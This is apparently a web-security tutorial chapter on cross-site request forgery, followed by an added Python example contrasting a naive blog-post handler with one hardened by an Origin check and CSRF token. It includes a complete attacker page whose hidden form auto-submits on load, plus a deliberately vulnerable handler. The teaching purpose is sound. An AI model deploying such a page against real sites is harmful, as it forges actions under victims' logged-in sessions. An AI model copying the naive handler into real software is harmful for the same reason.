Introduction to Cross-Site Request Forgery (XSRF)

In this chapter, you will be introduced to cross-site request forgery.

If XSS is a case of a browser trusting JavaScript from the server too much, XSRF is a case of a server trusting a browser too much.

Let’s go back to our example of a blogging site. Somehow there must be a browser request that saves a blog post to the server. Suppose the blog posting request looks something like this:

POST /blog/create HTTP/1.1
Host: www.romansjournalingsite.com
Accept-Encoding: gzip, deflate
Accept: */*
Cookie: sessionid=Re9ljf4uObKk9mSFqBlusxamUKw
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 57

body=It+was+the+best+of+posts.+It+was+the+worst+of+posts.&submit=Publish

In a naive web application, that could be all it takes to publish to a hosted blog—a POST request with a logged-in sessionid cookie. Let’s see how an attacker or an administrator of an evil website could use this for nefarious purposes.

Suppose I run a malicious website. I ostensibly serve up pictures of adorable kittens playing with yarn. But surreptitiously, I also serve up malicious content like this:

<html lang="en">
<head>
<title>Malicious site</title>
</head>
<body>
<h1>Malicious site</h1>
<!-- Same action URL and field names as the blog-post request above; the
     victim's browser attaches their sessionid cookie when it submits this. -->
<form action="http://www.romansjournalingsite.com/blog/create" method="POST">
<input
name="body"
value="Arbitrary Attacker-Controlled Content. I love evilxsrf.com"/>
<input type="submit" id="submit" name="submit" value="Publish"/>
</form>
<script>
/* Submit the form as soon as the page loads, with no click from the visitor. */
document.getElementById('submit').click();
</script>
</body>
</html>

What does this do? It creates a form with the action we just saw when we looked at the romansjournalingsite.com request that creates a new blog post. Additionally, the form is prepopulated with content that will create a blog post that says Arbitrary Attacker-Controlled Content. I love ...
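To make the server side of this concrete, here is an added example (not code from the course) that models the naive /blog/create handler the text describes next to a hardened version of the same handler, and runs both against the forged POST the attacker's form produces. The session store, user name, CSRF token and handler names are assumptions constructed for the example.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlencode

SITE_ORIGIN = "http://www.romansjournalingsite.com"
# Constructed session store: sessionid -> session data. The sessionid is the one
# from the captured request above; a fresh CSRF token is minted per session.
SESSIONS = {"Re9ljf4uObKk9mSFqBlusxamUKw": {"user": "roman", "csrf": secrets.token_urlsafe(32)}}
# What the attacker's auto-submitted form sends (constructed from the HTML above).
FORGED_HEADERS = {"Cookie": "sessionid=Re9ljf4uObKk9mSFqBlusxamUKw", "Origin": "http://evilxsrf.com"}
FORGED_BODY = "body=Arbitrary+Attacker-Controlled+Content&submit=Publish"

def session_for(headers):
    """Return the session named by the sessionid cookie, or None."""
    for part in headers.get("Cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "sessionid":
            return SESSIONS.get(value)
    return None

def naive_create_post(headers, body):
    """The naive handler from the text: a logged-in sessionid cookie is all it takes."""
    session = session_for(headers)
    if session is None:
        return 401, "not logged in"
    return 200, f"{session['user']} published: {parse_qs(body)['body'][0]}"

def hardened_create_post(headers, body):
    """Same handler with an Origin check and a synchronizer token added."""
    session = session_for(headers)
    if session is None:
        return 401, "not logged in"
    # Browsers attach Origin to cross-site form POSTs; anything but our own origin is refused.
    if headers.get("Origin") != SITE_ORIGIN:
        return 403, "cross-site request rejected"
    # The form must echo the token issued to this session; evilxsrf.com cannot read it.
    form = parse_qs(body)
    token = form.get("csrf_token", [""])[0]
    if not hmac.compare_digest(token, session["csrf"]):
        return 403, "missing or wrong CSRF token"
    return 200, f"{session['user']} published: {form['body'][0]}"

def legit_request():
    """A same-site submission from the real blog editor, token included."""
    headers = {"Cookie": "sessionid=Re9ljf4uObKk9mSFqBlusxamUKw", "Origin": SITE_ORIGIN}
    token = SESSIONS["Re9ljf4uObKk9mSFqBlusxamUKw"]["csrf"]
    body = urlencode({"body": "It was the best of posts.", "csrf_token": token, "submit": "Publish"})
    return headers, body
```

The naive handler publishes the forged post because the cookie alone satisfies it; the hardened one rejects it at the Origin check, and even a same-origin request is rejected unless it carries the session's token.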